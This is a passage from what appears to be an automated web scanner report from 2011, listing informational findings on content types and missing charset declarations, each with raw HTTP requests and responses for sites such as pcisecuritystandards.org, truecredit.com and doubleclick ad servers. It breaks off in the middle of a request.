Cookie: ASP.NET_SessionId=qcipgv45ri0zgf3qhp4uir45; safe_cookie21=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843; safe_cookie22=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:56:56 GMT
Content-Length: 14877


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

30.19. https://www.hotelclub.com/Common/tripleclick/tripleclick.tracker.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelclub.com
Path:   /Common/tripleclick/tripleclick.tracker.asp

Request

GET /Common/tripleclick/tripleclick.tracker.asp HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; anon=1129876971252011042422094; WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643486711:ss=1303643390479; NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974; ASPSESSIONIDCCQRQCTQ=FDCOCPBANKNGOIFKLDNNOFAM; s_lp=no; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]; s_sq=%5B%5BB%5D%5D; HTC=AppVer=1%2E0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:52:56 GMT
Connection: close


30.20. https://www.my3bureaucreditreport.com/19331/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.my3bureaucreditreport.com
Path:   /19331/

Request

GET /19331/ HTTP/1.1
Host: www.my3bureaucreditreport.com
Connection: keep-alive
Referer: http://www.my3bureaucreditreport.com/?sid=12750&ad=12759
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=4ch5l4athaug1yqe2ymeuk45; __utmz=175466430.1303691698.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=175466430.268555149.1303691698.1303691698.1303691698.1; __utmc=175466430; __utmb=175466430.1.10.1303691698

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 01:27:14 GMT
Content-Length: 12361


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/
...[SNIP]...

30.21. https://www.pcisecuritystandards.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /

Request

GET / HTTP/1.1
Host: www.pcisecuritystandards.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:27:56 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

30.22. https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /documents/pci_dss_v2.pdf

Request

GET /documents/pci_dss_v2.pdf HTTP/1.1
Host: www.pcisecuritystandards.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:27:52 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 15:25:10 GMT
ETag: "313836-1de1de-4944fe14ba180"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/pdf
Content-Length: 1958366

%PDF-1.4
%....
5 0 obj
<</Length 6 0 R/Filter /FlateDecode>>
stream
x..UMo$5.........W.\...".B.#....Iv...(.p.........H.L..W...c.].....j....7.}z..cw..b\>.C..~...>...G..C..G@..@....:..\...}......_.W.
...[SNIP]...

30.23. https://www.pcisecuritystandards.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.pcisecuritystandards.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:27:53 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 12:55:01 GMT
ETag: "3535bc-57e-494258ca27340"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 1406

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

30.24. https://www.pcisecuritystandards.org/news_events/rss.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /news_events/rss.php

Request

GET /news_events/rss.php HTTP/1.1
Host: www.pcisecuritystandards.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 16:52:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


30.25. https://www.pcisecuritystandards.org/security_standards/documents.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /security_standards/documents.php

Request

GET /security_standards/documents.php HTTP/1.1
Host: www.pcisecuritystandards.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 16:52:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

30.26. https://www.privacyguard.com/BCA/PG_NEW/Images/flash/PGPA53AF_NoPrem_CM.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /BCA/PG_NEW/Images/flash/PGPA53AF_NoPrem_CM.swf

Request

GET /BCA/PG_NEW/Images/flash/PGPA53AF_NoPrem_CM.swf HTTP/1.1
Host: www.privacyguard.com
Connection: keep-alive
Referer: https://www.privacyguard.com/secure/promo.aspx?lyr=promoLyr1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vjqmz2rc2b0xys55zdgjhzzd; Visitor=c503162f39474998a2c7f2c0f13737f7; __utmz=88639066.1303674285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=88639066.483249494.1303674285.1303674285.1303674285.1; __utmc=88639066; __utmb=88639066.1.10.1303674285; hasCookies=true

Response

HTTP/1.1 200 OK
Content-Length: 29845
Content-Type: application/x-swf
Last-Modified: Wed, 19 Jan 2011 10:05:30 GMT
Accept-Ranges: bytes
ETag: "051267c0b7cb1:4527"
X-Served-By: FOX
Date: Sun, 24 Apr 2011 20:21:58 GMT

FWS..t..0
......C......D.
......s....*@r......@.....X.....}.8..".... A...``a.......@@....|.9.Q.>..... .._...8>.1...........]?..Q2$H.B...U.......$t..@.[.`....F...)nY.... ......X..`U.`!...Q.....K....
...[SNIP]...

30.27. https://www.truecredit.com/Shortcut_Icon_TU.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /Shortcut_Icon_TU.ico

Request

GET /Shortcut_Icon_TU.ico HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_visit%3D1%7C1303676208552%3B%20s_depth%3D1%7C1303676208554%3B%20dfa_cookie%3Dtuitruecredit%7C1303676208557%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%255D%7C1461527208560%3B%20s_nr%3D1303674408563%7C1306266408563%3B%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_invisit%3Dtrue%7C1303676208564%3B%20s_lv%3D1303674408567%7C1398282408567%3B%20s_lv_s%3DFirst%2520Visit%7C1303676208567%3B%20s_pv%3Dtc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%7C1303676208571%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674408562%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D100%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:12:57 GMT
Server: Apache
Last-Modified: Thu, 24 Feb 2011 22:57:10 GMT
ETag: "47e-22289d80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /js/jquery/jquery.templating.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /js/jquery/jquery.templating.js HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
Referer: https://cam.infusionsoft.com/cart/process?packageCode=standard&affiliate=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620; JSESSIONID=A4215DE137CDBD905410D00F870D2667

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2199-1301405234000"
Last-Modified: Tue, 29 Mar 2011 13:27:14 GMT
Content-Type: text/javascript
Content-Length: 2199
Date: Mon, 25 Apr 2011 01:07:23 GMT

/**
* Copyright Yehuda Katz
* with assistance by Jay Freeman
*
* You may distribute this code under the same license as jQuery (BSD or GPL
**/

/*

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HT
...[SNIP]...
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<title>
...[SNIP]...

32. HTML does not specify charset  previous  next
There are 107 instances of this issue:


32.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...

32.2. http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3016.158901.DATAXU/B5398270.22

Request

GET /adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6373

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.3. http://ad.doubleclick.net/adi/N3285.turn/B2343920.7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.turn/B2343920.7

Request

GET /adi/N3285.turn/B2343920.7;sz=160x600;ord=8440323269241723068?;click=http://r.turn.com/r/tpclick/id/vNidbEsNInUS2QkABQIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676549&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658549115&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658549122&frm=1&adk=2614322350&ga_vid=574713569.1303658549&ga_sid=1303658549&ga_hid=1439411518&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5083

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...

32.4. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=;ord=1061289247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7335
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:13:17 GMT
Expires: Sun, 24 Apr 2011 16:13:17 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1
...[SNIP]...

32.5. http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.turn.com/B5269631.6

Request

GET /adi/N3905.turn.com/B5269631.6;sz=160x600;ord=8461559076100471709?;click=http://r.turn.com/r/tpclick/id/nXvzACZ_bXWccgsA-gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680047&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662047220&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662047231&frm=1&adk=2614322350&ga_vid=1889800734.1303662047&ga_sid=1303662047&ga_hid=184650008&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7635
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:20:46 GMT
Expires: Sun, 24 Apr 2011 16:20:46 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.6. http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.158901.DATAXU/B5279302.4

Request

GET /adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
